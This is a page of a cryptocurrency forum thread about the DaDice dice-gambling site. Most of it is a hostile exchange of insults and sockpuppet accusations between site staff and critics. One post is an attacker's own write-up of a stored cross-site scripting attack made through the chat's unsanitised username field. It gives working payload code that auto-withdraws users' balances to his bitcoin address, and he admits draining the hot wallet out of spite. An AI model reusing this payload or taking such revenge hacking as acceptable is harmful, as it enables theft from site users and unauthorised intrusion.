Bitcoin Forum
November 18, 2024, 07:28:42 AM *
News: Latest Bitcoin Core release: 28.0 [Torrent]
 
   Home   Help Search Login Register More  
Warning: One or more bitcointalk.org users have reported that they strongly believe that the creator of this topic is a scammer. (Login to see the detailed trust ratings.) While the bitcointalk.org administration does not verify such claims, you should proceed with extreme caution.
Pages: « 1 ... 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 [101] 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 ... 185 »
  Print  
Author Topic: DaDice.com - Next Gen Social Gambling Dice Experience | Progressive Jackpot  (Read 257868 times)
Quickseller
Copper Member
Legendary
*
Offline Offline

Activity: 2996
Merit: 2374


View Profile
June 05, 2015, 03:42:24 PM
 #2001

you're really not getting it. if I'd pay you more than dadice, could I be your pimp?  Cool what's your price?

Why would you pay anymore more than dadice does? So there is indeed some corporate vendetta here Cheesy




Anyway I guess this thread will have to live having a few jerks around, better swallow it Smiley Good luck!


just wanted to know how cheap/expensive a legendary whore is  Tongue

nope, unfortunately no competition here (though that might change, since I just saw that multidice is for sale. only 2.5btc, could be worth it for dadice, finally some working code, right?  Grin ).


The real whore here is you mate, sorry but you are!

I will conquer any dice site online, that our code is superior compared to theirs. Get me a trusted and independent expert and we are ready to challenge whoever likes to challenge us.
You are kidding right? You do realize that your site was just hacked two days ago? Literally

It was not at all! Wanna take the challenge? We are ready competition!
Well I don't have a dice site of my own so I would be unable to accept your challenge. However based on my limited experience on your site, I think it is safe to say that your code is not superior.

★ ★ ██████████████████████████████[█████████████████████
██████████████████████████████████████████████████████████████████████
██████████████████████████████████████████████████████████████████
███████████████████████████████████████████████████████████████████
████████████████████████████████████████████████████████████████████
██████████████████████████████████████████████████████████████████
███████████████████████████████████████████████████████████████████
█████████████████████████████████████████████████████████████████████
█████████████████████████████████████████████████████
██████████████████████████████████████████████████████████████████
█████████████████████████████████████████████████████████████
████████████████████████████████████████████████████████████
███████████████████████████████████████████████████████████████████
★ ★ 
dadice (OP)
Sr. Member
****
Offline Offline

Activity: 252
Merit: 250


DaDice Administration


View Profile
June 05, 2015, 03:46:06 PM
Last edit: June 05, 2015, 03:58:33 PM by dadice
 #2002

you're really not getting it. if I'd pay you more than dadice, could I be your pimp?  Cool what's your price?

Why would you pay anymore more than dadice does? So there is indeed some corporate vendetta here Cheesy




Anyway I guess this thread will have to live having a few jerks around, better swallow it Smiley Good luck!


just wanted to know how cheap/expensive a legendary whore is  Tongue

nope, unfortunately no competition here (though that might change, since I just saw that multidice is for sale. only 2.5btc, could be worth it for dadice, finally some working code, right?  Grin ).


The real whore here is you mate, sorry but you are!

I will conquer any dice site online, that our code is superior compared to theirs. Get me a trusted and independent expert and we are ready to challenge whoever likes to challenge us.
You are kidding right? You do realize that your site was just hacked two days ago? Literally

It was not at all! Wanna take the challenge? We are ready competition!
Well I don't have a dice site of my own so I would be unable to accept your challenge. However based on my limited experience on your site, I think it is safe to say that your code is not superior.

Well, if you think so you haven't read read through the PD and PRC threads for their first 12 month - even after that time ... lol

See -- how many exploits, how many bugs, how many coins stolen???

For the record, we are 3 months and 2 day old today!

<- My trust rating is a joke, due to the poor and worthless implementation of trust ratings at bitcointalk.org
mfaspk
Newbie
*
Offline Offline

Activity: 56
Merit: 0


View Profile
June 05, 2015, 03:46:50 PM
 #2003

You are kidding right? You do realize that your site was just hacked two days ago? Literally

It was a second* time, both times thru "troll box". PRC, PD have had even severe vulnerbilities, which caused them a lot more damages! As I said it wouldn't be normal if Da Dice is never hacked. Hacking = good! Keep hacking it to the point its fucked, and "only" if it doesnt come back then it is the issue. As said in post before mine, PD and PRC had severer issues even after 1 year online... Why the fuck do you guys compare a site thats 3 months online with all those sites (which by the way, again, have had their fair share of hacking!).

Why would you keep switching between QuickSellet and AcctSeller? Look I gave an advice your friend, I give the same to you:

Look, a peice of advice, the little lump of flesh between your legs is not to do the "thinking business", use your brains sometimes?

between have you refunded those ~1 BTC back to da dice that you earned after selling your "signature" ?
Da_Dice_Staff
Full Member
***
Offline Offline

Activity: 154
Merit: 100



View Profile
June 05, 2015, 03:47:09 PM
 #2004

you're really not getting it. if I'd pay you more than dadice, could I be your pimp?  Cool what's your price?

Why would you pay anymore more than dadice does? So there is indeed some corporate vendetta here Cheesy




Anyway I guess this thread will have to live having a few jerks around, better swallow it Smiley Good luck!


just wanted to know how cheap/expensive a legendary whore is  Tongue

nope, unfortunately no competition here (though that might change, since I just saw that multidice is for sale. only 2.5btc, could be worth it for dadice, finally some working code, right?  Grin ).


The real whore here is you mate, sorry but you are!

I will conquer any dice site online, that our code is superior compared to theirs. Get me a trusted and independent expert and we are ready to challenge whoever likes to challenge us.
You are kidding right? You do realize that your site was just hacked two days ago? Literally

It was not at all! Wanna take the challenge? We are ready competition!
Well I don't have a dice site of my own so I would be unable to accept your challenge. However based on my limited experience on your site, I think it is safe to say that your code is not superior.

If you can't compare than you cannot make a statement like that. Quite simply as well it is evident that you did not read the devs report in full so you would know we were not actually hacked. Resorting to some serious FUD  instead of actual real evidence etc. It's the last resort of teh hard of thinking I'm afraid
tspacepilot
Legendary
*
Offline Offline

Activity: 1456
Merit: 1081


I may write code in exchange for bitcoins.


View Profile
June 05, 2015, 03:52:45 PM
 #2005

Why would you keep switching between QuickSellet and AcctSeller?

It's called sockpuppetry---classic technique in internet trolling.  The more interesting question is how many others of the haters in this thread are QS and whether or not he funded this attack himself.
dadice (OP)
Sr. Member
****
Offline Offline

Activity: 252
Merit: 250


DaDice Administration


View Profile
June 05, 2015, 03:53:17 PM
 #2006

If you can't compare than you cannot make a statement like that. Quite simply as well it is evident that you did not read the devs report in full so you would know we were not actually hacked. Resorting to some serious FUD  instead of actual real evidence etc. It's the last resort of teh hard of thinking I'm afraid

For those kids here a dead pixel is a bug. But of course, only if found at DD. And another bump, thanks so much guys. Nobody here for the challenge yet?

<- My trust rating is a joke, due to the poor and worthless implementation of trust ratings at bitcointalk.org
dadice (OP)
Sr. Member
****
Offline Offline

Activity: 252
Merit: 250


DaDice Administration


View Profile
June 05, 2015, 03:56:00 PM
 #2007

Why would you keep switching between QuickSellet and AcctSeller?

It's called sockpuppetry---classic technique in internet trolling.  The more interesting question is how many others of the haters in this thread are QS and whether or not he funded this attack himself.

Most probably he did! Personally I thought so long, but it would be inappropriate if I would have mentioned it.

<- My trust rating is a joke, due to the poor and worthless implementation of trust ratings at bitcointalk.org
mfaspk
Newbie
*
Offline Offline

Activity: 56
Merit: 0


View Profile
June 05, 2015, 03:57:16 PM
 #2008

Why would you keep switching between QuickSellet and AcctSeller?

It's called sockpuppetry---classic technique in internet trolling.  The more interesting question is how many others of the haters in this thread are QS and whether or not he funded this attack himself.

Most probably he did! Personally I thought so long, but it would be inappropriate if I would have mentioned it.

Then we better see how long "their" "fundings" "might" "last"! Afterall there is some source of fuel for all these trolls & co.
dadice (OP)
Sr. Member
****
Offline Offline

Activity: 252
Merit: 250


DaDice Administration


View Profile
June 05, 2015, 04:12:23 PM
 #2009

Why would you keep switching between QuickSellet and AcctSeller?

It's called sockpuppetry---classic technique in internet trolling.  The more interesting question is how many others of the haters in this thread are QS and whether or not he funded this attack himself.

Most probably he did! Personally I thought so long, but it would be inappropriate if I would have mentioned it.

Then we better see how long "their" "fundings" "might" "last"! Afterall there is some source of fuel for all these trolls & co.

Oh yes of course, but it is very beneficial for us in the long run. Just think if they would remain silent and bury our thread.

<- My trust rating is a joke, due to the poor and worthless implementation of trust ratings at bitcointalk.org
Da_Dice_Staff
Full Member
***
Offline Offline

Activity: 154
Merit: 100



View Profile
June 05, 2015, 04:17:41 PM
 #2010

Why would you keep switching between QuickSellet and AcctSeller?

It's called sockpuppetry---classic technique in internet trolling.  The more interesting question is how many others of the haters in this thread are QS and whether or not he funded this attack himself.

Most probably he did! Personally I thought so long, but it would be inappropriate if I would have mentioned it.

Then we better see how long "their" "fundings" "might" "last"! Afterall there is some source of fuel for all these trolls & co.

Oh yes of course, but it is very beneficial for us in the long run. Just think if they would remain silent and bury our thread.

Indeed but still somewhat sad that all they use at the moment is ad hominems, straw man tactics and the myriad other logical fallacies available to them
dadice (OP)
Sr. Member
****
Offline Offline

Activity: 252
Merit: 250


DaDice Administration


View Profile
June 05, 2015, 04:20:17 PM
 #2011

Why would you keep switching between QuickSellet and AcctSeller?

It's called sockpuppetry---classic technique in internet trolling.  The more interesting question is how many others of the haters in this thread are QS and whether or not he funded this attack himself.

Most probably he did! Personally I thought so long, but it would be inappropriate if I would have mentioned it.

Then we better see how long "their" "fundings" "might" "last"! Afterall there is some source of fuel for all these trolls & co.

Oh yes of course, but it is very beneficial for us in the long run. Just think if they would remain silent and bury our thread.

Indeed but still somewhat sad that all they use at the moment is ad hominems, straw man tactics and the myriad other logical fallacies available to them

Yeah true, but anyway, that is how immature kids are. And of course, they are all experts  Huh

<- My trust rating is a joke, due to the poor and worthless implementation of trust ratings at bitcointalk.org
bodgybrothers
Member
**
Offline Offline

Activity: 106
Merit: 10


View Profile
June 05, 2015, 04:27:32 PM
 #2012

Why would you keep switching between QuickSellet and AcctSeller?

It's called sockpuppetry---classic technique in internet trolling.  The more interesting question is how many others of the haters in this thread are QS and whether or not he funded this attack himself.

Most probably he did! Personally I thought so long, but it would be inappropriate if I would have mentioned it.

Then we better see how long "their" "fundings" "might" "last"! Afterall there is some source of fuel for all these trolls & co.

Oh yes of course, but it is very beneficial for us in the long run. Just think if they would remain silent and bury our thread.

Indeed but still somewhat sad that all they use at the moment is ad hominems, straw man tactics and the myriad other logical fallacies available to them

Yeah true, but anyway, that is how immature kids are. And of course, they are all experts  Huh

Well, bitcoin is a kind of niche that attracks many geek types. So there could well be a lot of experts in this space. We have just heard of one who works as a pentester. So I would say he is an expert.

Your arrogance is really quite annoying to me. You think everyone is dumber than you.
BTW - still no clear explanation from the developer of dadice.
mfaspk
Newbie
*
Offline Offline

Activity: 56
Merit: 0


View Profile
June 05, 2015, 04:28:49 PM
 #2013

*lot of bullshit*

he he he ho ho ho... You still didn't take my advice? Sad poor lad
dadice (OP)
Sr. Member
****
Offline Offline

Activity: 252
Merit: 250


DaDice Administration


View Profile
June 05, 2015, 04:37:58 PM
 #2014

Your arrogance is really quite annoying to me. You think everyone is dumber than you.
BTW - still no clear explanation from the developer of dadice.

Well, still you are very busy in our thread. Dev was online all day and addressed all issues. As we recommended earlier, you can also email support and might get a bounty - but as we know, this is not on your hidden agenda.

Bump!

<- My trust rating is a joke, due to the poor and worthless implementation of trust ratings at bitcointalk.org
bodgybrothers
Member
**
Offline Offline

Activity: 106
Merit: 10


View Profile
June 06, 2015, 02:26:56 AM
 #2015

Your arrogance is really quite annoying to me. You think everyone is dumber than you.
BTW - still no clear explanation from the developer of dadice.

Well, still you are very busy in our thread. Dev was online all day and addressed all issues. As we recommended earlier, you can also email support and might get a bounty - but as we know, this is not on your hidden agenda.

Bump!

Even if I did have anything to tell you, your dev fixed it (according to his statement). So nothing to report.

You probably should calm your shills down. They are getting kind of offensive, I had to block one angry mobster. Anyway, I'm done here. Enjoy your lives, till the next great bitcoin scam attempt.

And shills, please do calm down, you are more pissed off about these reports than the dadice_staff is.
bodgybrothers
Member
**
Offline Offline

Activity: 106
Merit: 10


View Profile
June 06, 2015, 03:29:14 AM
Last edit: June 06, 2015, 04:12:38 AM by bodgybrothers
 #2016

The un-official report of how this attack was able to happen

Sorry, dadice_dev didn't explain how it happened. So I thought I would add an explanation so the public can make up for themselves if it was or wasn't serious. My oppinion is this is serious. But what do I know? This will be my last post on dadice.

After the first attack. Explained here:
https://bitcointalk.org/index.php?topic=973765.msg11351048#msg11351048

A fix was sorted to prevent users being impersonated. However, the injection method stayed the same. In fact back then it was possible to do the same thing. However, the test here was to see if DaDice would lie about the severity and I didn't want to impact them too much. Think of it as a free bug report.

So back to what enabled all this drama.

The object:
Code:
var socket_handshake_gameplay_token

is the offending player. It tells the chat server who you are.

Code:
var socket_handshake_gameplay_token = {
    "token": "1|11111111111111111111|1.1.1.1",
    "user": {
        "id": "1",
        "username": "One",
        "name": "",
        "cm": "false"
    },
    "shared_secret": null
};

It is sent to the chat server to update the chat server.
Code:
socket.emit("online", socket_handshake_gameplay_token);

Thats fine, so how can we use this to update all clients with some JS code?

That required a lot of trial and error. Finding ways to do things is not always as simple as reading the code. One must first understand how these will render on the client browser. There was lots of time to be caught in the act. Maybe DaDice wanted to watch or just legitimately didn't think it was all that serious.

The userlist on the chat window is now where we need to look. The chat box does not allow scripts to run, but the userlist still updated with the new name change. Like this:
Code:
var socket_handshake_gameplay_token = {
    "token": "1|11111111111111111111|1.1.1.1",
    "user": {
        "id": "1",
        "username": "Two", //change name and user list updates
        "name": "",
        "cm": "false"
    },
    "shared_secret": null
}

So now what.. We can make the server send our new username to all clients and all new clients.

Lets try running some JS. and keep the original HTML so it doesn't cause errors.
Code:
var socket_handshake_gameplay_token = {
    "token": "1|11111111111111111111|1.1.1.1",
    "user": {
        "id": "1",
        "username": 'One"  class="" href="javascript:;"><script>//put script here</script>',
        "name": "",
        "cm": "false"
    },
    "shared_secret": null
}

Now we can run any script we want. We could have called our own server and sent cookies and session data, or maybe implement subtle things like redirect the deposit code to our btc address. Since no one deposits on DaDice, that would be a tremendous waste of time.

A script to auto withdraw the dust was more fun.. But the hot wallet rarely has more than 0.1btc in it. This was not to take coin, but to show the dev he is arrogant. Had he not dismissed my first post I probably would have just reported it (I'm not interested in bug bounty money, I already have more than enough money). But he was a prick and I felt it would be better to just do another attack using JS. Maybe they can learn to be nice in the future. I was not paid nor did I do it to benefit any other dice site. This was done purely out of my personal spite to the people running DaDice because they were assholes to me.

My code here is pretty messy, setting up some events would have been better, but I was pretty lazy and the wallet only had 0.008btc left in it.
Code:
function clickButton(buttonName){$(".btn").each(function(i, obj) {
  if ($(this).text()==buttonName){$(this).click();
$("#withdraw_payee").val("1Nu7zXeUEV1aBzVQCtY4unDiFJFxdRSN9b");
$("#withdraw_amount").val("0.001");}});
};

setInterval(function(){alert("DaDice has been Hacked.. bullshit message");clickButton("Withdraw");},5000);

Then entire JS injection that was pasted into the console was this. This is not exactly as it was, because I was coding in the console and didn't save it. But you get the idea.
Code:
var socket_handshake_gameplay_token = {
    "token": "1|11111111111111111111|1.1.1.1",
    "user": {
        "id": "1",
        "username": 'One"  class="" href="javascript:;"><script>function clickButton(buttonName){$(".btn").each(function(i, obj) {if ($(this).text()==buttonName){$("#withdraw_payee").val("1Nu7zXeUEV1aBzVQCtY4unDiFJFxdRSN9b");$("#withdraw_amount").val(+($("h2").text()-0.0001));$(this).click();}});};setInterval(if (+$("h2").text()>0.0011){function(){$("#account_withdraw").click();setTimeout(function(){clickButton("Withdraw");},5000);},10000);}</script>',
        "name": "",
        "cm": "false"
    },
    "shared_secret": null
};
socket.emit("online", socket_handshake_gameplay_token);
socket.emit("online_list_request", socket_handshake_gameplay_token);

I will also be sending back the 0.008btc drained from the hot wallet to an account on DaDice, and I will even send a few extra dust particles as interest for the loan.  This will also end the DaDice attacks. Someone else will probably find something new. Who knows. So be careful because DaDice have a history of taking a long time to fix known issues. If I wasn't so open, this would still be going on.

The point is, DaDice knew about this for weeks and nothing was done about it. They lied about the severity, or didn't realize the severity. If I ran a dice site, and had the same issue, I probably would try step around the severity too, can't blame them on that front. It was a simple chat attack. But this "simple" attack was a serious breach as we were able to run as much code as we wanted to. Anything could have been done on the client machines.
It also would have been prevented if they just allowed a skype call that I requested and was ignored.

I wished the Dev would have posted something more concrete like this. but instead he just tried to reduce it to a simple chat attack that did not impact their security. Yes it was indeed simple, but it was a major security breach.

Enjoy the day.
tryphe
Member
**
Offline Offline

Activity: 116
Merit: 10


View Profile
June 06, 2015, 03:41:05 AM
 #2017

Or just stop using JS, the worst "language" on the planet.
dadice_dev
Newbie
*
Offline Offline

Activity: 48
Merit: 0


View Profile
June 06, 2015, 07:31:02 AM
 #2018

Well I did say exactly the same thing:

Anyway, all this happened this time because our socket script didn't sanitize some data (background variables, exploited from console) which was sent along with chat messages or other online/offline commands.

Chat/Sockets script did only sanitize the user-submitted data, not the data coming from JS. This was the actual exploit Smiley Necessary actions were taken and this is now fixed. If you have anything further to report, you can do so like others have done before, contact our support and expect a bounty reward.
Da_Dice_Staff
Full Member
***
Offline Offline

Activity: 154
Merit: 100



View Profile
June 06, 2015, 07:48:20 AM
 #2019

Well I did say exactly the same thing:

Anyway, all this happened this time because our socket script didn't sanitize some data (background variables, exploited from console) which was sent along with chat messages or other online/offline commands.

Chat/Sockets script did only sanitize the user-submitted data, not the data coming from JS. This was the actual exploit Smiley Necessary actions were taken and this is now fixed. If you have anything further to report, you can do so like others have done before, contact our support and expect a bounty reward.

Well said from the dev there. The bounty offered for bug reporting is more than just a bit of money. It's an act of good faith that shows we appreciate good feedback from our players or those who discover something. Our dev has also admitted the problem and fixed the issue in good time as well so that should be the end of that I believe. Rather behave in what I feel is a civilised and intelligent manner (as I just mentioned) then spend time and unnecessary energy on roundabout attacking routes. This way we can actually build a proper community rather than what appears to be the case now
Da_Dice_Staff
Full Member
***
Offline Offline

Activity: 154
Merit: 100



View Profile
June 06, 2015, 07:55:46 AM
 #2020

SOOOOON!!!!!!!!



197 million rolls already!. Will the bounty hit today or tomorrow?

The bounty could be an incredible 1.15BTC if it hits today!

Keep watching and especially keep rollin
Pages: « 1 ... 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 [101] 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 ... 185 »
  Print  
 
Jump to:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!